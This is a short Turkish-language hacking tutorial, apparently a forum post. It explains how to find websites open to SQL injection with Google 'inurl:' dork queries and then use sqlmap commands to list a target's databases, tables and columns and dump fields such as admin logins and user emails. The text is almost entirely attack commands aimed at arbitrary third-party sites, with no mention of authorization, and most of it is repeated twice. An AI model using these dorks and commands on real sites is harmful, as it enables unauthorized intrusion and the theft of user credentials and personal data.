ilk önce sql açıklı bir site bulup sonra database çekiyoruz
sql açıklı site bulmak için inurl:show.php?id= inurl:readnews.php?id= vs vs.
python sqlmap.py -u http://www.hedefsite.com/index.php?id=1 --dbs
sonra datayı bulduk şimdi datadaki veri tabanlarına bakmamız lazım bunun için
sqlmap.py -u http://www.hedefsite.com/index.php?id=1 -D veritabanıadı --tables
sonra veri tabanını çektikten sonra admin user mail ve işinize yarıcak kolonları çekmemiz lazım bunun için
sqlmap.py -u http://www.hedefsite.com/index.php?id=1 -D veritabanıadı -T tabloadı --columns
Sonra istediğimiz kolonlara ait datayı çekmek için şu komutu giriyoruz :
sqlmap.py -u http://www.hedefsite.com/index.php?id=1 -D veritabanıadı -T tabloadı -C kolonadı1,kolonadı2,kolonadı3 --dump
ve datadaki bilgileri size veriyor
sql açıklı site bulmak için inurl:show.php?id= inurl:readnews.php?id= vs vs.
python sqlmap.py -u http://www.hedefsite.com/index.php?id=1 --dbs
sonra datayı bulduk şimdi datadaki veri tabanlarına bakmamız lazım bunun için
sqlmap.py -u http://www.hedefsite.com/index.php?id=1 -D veritabanıadı --tables
sonra veri tabanını çektikten sonra admin user mail ve işinize yarıcak kolonları çekmemiz lazım bunun için
sqlmap.py -u http://www.hedefsite.com/index.php?id=1 -D veritabanıadı -T tabloadı --columns
Sonra istediğimiz kolonlara ait datayı çekmek için şu komutu giriyoruz :
sqlmap.py -u http://www.hedefsite.com/index.php?id=1 -D veritabanıadı -T tabloadı -C kolonadı1,kolonadı2,kolonadı3 --dump
ve datadaki bilgileri size veriyor